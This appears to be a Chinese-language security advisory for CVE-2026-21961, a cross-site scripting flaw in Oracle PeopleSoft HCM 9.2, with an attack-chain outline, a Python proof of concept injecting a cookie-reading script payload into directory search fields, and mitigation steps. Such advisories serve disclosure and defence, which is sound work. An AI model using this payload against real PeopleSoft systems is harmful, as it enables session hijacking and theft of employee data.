CVE-2026-21961: PeopleSoft Enterprise HCM Human Resources 跨站脚本漏洞

漏洞信息

漏洞编号

CVE-2026-21961

漏洞类型

跨站脚本攻击(XSS)

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Oracle PeopleSoft Enterprise HCM Human Resources

漏洞概述

CVE-2026-21961是Oracle PeopleSoft Enterprise HCM Human Resources产品中的一个中等严重性安全漏洞。该漏洞位于Company Dir / Org Chart Viewer和Employee Snapshot组件中。攻击者可以通过HTTP网络请求轻松利用此漏洞，无需认证即可发起攻击，但需要受害者进行交互操作。成功利用此漏洞可导致未经授权的数据读取访问，以及对部分可访问数据的更新、插入或删除操作。CVSS 3.1基础评分为6.1分（中等严重性），主要影响数据的机密性和完整性。该漏洞影响PeopleSoft Enterprise HCM Human Resources的9.2版本。虽然漏洞本身在Human Resources产品中，但攻击可能对其他产品产生重大影响（范围变更）。

技术细节

该漏洞是存储型或反射型跨站脚本（XSS）漏洞，存在于PeopleSoft Enterprise HCM的Company Dir和Org Chart Viewer组件中。攻击者可以通过构造恶意脚本代码并嵌入到用户输入字段中，当其他用户访问包含恶意代码的页面时，浏览器会执行这些脚本。攻击者利用此漏洞可以窃取用户会话cookie、劫持用户账户、读取敏感数据或进行钓鱼攻击。由于漏洞需要用户交互（如点击链接或访问特定页面），攻击复杂度较低（AC:L），但攻击者可以通过社会工程学手段诱骗受害者。由于漏洞影响范围变更（S:C），攻击可能波及到其他相关产品系统。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标PeopleSoft Enterprise HCM系统的版本和配置，确认其为9.2版本，并定位Company Dir或Org Chart Viewer组件的入口点

STEP 2

步骤2: 构造恶意载荷

攻击者构造XSS恶意脚本代码，如<script>alert(document.cookie)</script>，用于窃取用户会话凭证或执行其他恶意操作

STEP 3

步骤3: 注入恶意代码

攻击者将恶意脚本通过HTTP请求注入到Company Dir或Employee Snapshot组件的输入字段中，如姓名、公司名称等参数

STEP 4

步骤4: 等待受害者触发

攻击者诱骗具有访问权限的用户（HR人员或管理员）访问包含恶意代码的页面，需要用户点击链接或访问特定视图

STEP 5

步骤5: 脚本执行与数据窃取

当受害者浏览器加载页面时，恶意脚本被执行，攻击者可以窃取会话cookie、劫持用户会话、读取敏感员工数据或进行进一步横向移动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2026-21961 PoC - PeopleSoft XSS in Company Dir/Org Chart Viewer
# This PoC demonstrates the XSS vulnerability in PeopleSoft Enterprise HCM

import requests
import urllib3
urllib3.disable_warnings()

target_url = "https://vulnerable-server/psp/HR92DEV/EMPLOYEE/HRMS/c/COMPANY_DIR.GBL"

# XSS payload for Company Dir/Org Chart Viewer
xss_payload = "<script>alert(document.cookie)</script>"

# For Employee Snapshot component
snapshot_url = "https://vulnerable-server/psp/HR92DEV/EMPLOYEE/HRMS/c/EMPLOYEE_SNAPSHOT.GBL"

def test_xss_vulnerability(url, payload):
    """Test for XSS vulnerability in PeopleSoft components"""
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
        'Content-Type': 'application/x-www-form-urlencoded',
    }
    
    # Parameters that might be vulnerable (COMPANY_DIR and EMPLOYEE_SNAPSHOT)
    data = {
        'ICAction': 'SEARCHBTN',  # Search button action
        'COMPANY': xss_payload,
        'NAME': xss_payload,
    }
    
    try:
        response = requests.post(url, headers=headers, data=data, verify=False, timeout=30)
        if xss_payload in response.text:
            print(f"[+] Potential XSS vulnerability found at: {url}")
            return True
        else:
            print(f"[-] No obvious XSS reflection detected")
            return False
    except requests.RequestException as e:
        print(f"[-] Request failed: {e}")
        return False

if __name__ == "__main__":
    print("CVE-2026-21961 PoC - PeopleSoft XSS Test")
    print("Target: PeopleSoft Enterprise HCM 9.2")
    print("Component: Company Dir / Org Chart Viewer, Employee Snapshot")
    test_xss_vulnerability(target_url, xss_payload)
    test_xss_vulnerability(snapshot_url, xss_payload)

影响范围

Oracle PeopleSoft Enterprise HCM Human Resources 9.2

防御指南

临时缓解措施

在Oracle官方补丁发布之前，可以采取以下临时缓解措施：1）限制对Company Dir和Org Chart Viewer组件的网络访问，仅允许受信任的IP地址访问；2）启用PeopleSoft的会话管理和CSRF令牌机制；3）对用户输入进行严格的HTML转义处理；4）监控HTTP请求中的可疑脚本特征；5）提醒用户不要点击来源不明的链接，尤其是包含公司目录或组织结构图相关的链接；6）考虑临时禁用非必要的员工信息展示功能。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-21961
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-21961
3 Details https://www.cvedetails.com/cve/CVE-2026-21961/
4 VulDB https://vuldb.com/cve/CVE-2026-21961
5 Link https://www.oracle.com/security-alerts/cpujan2026.html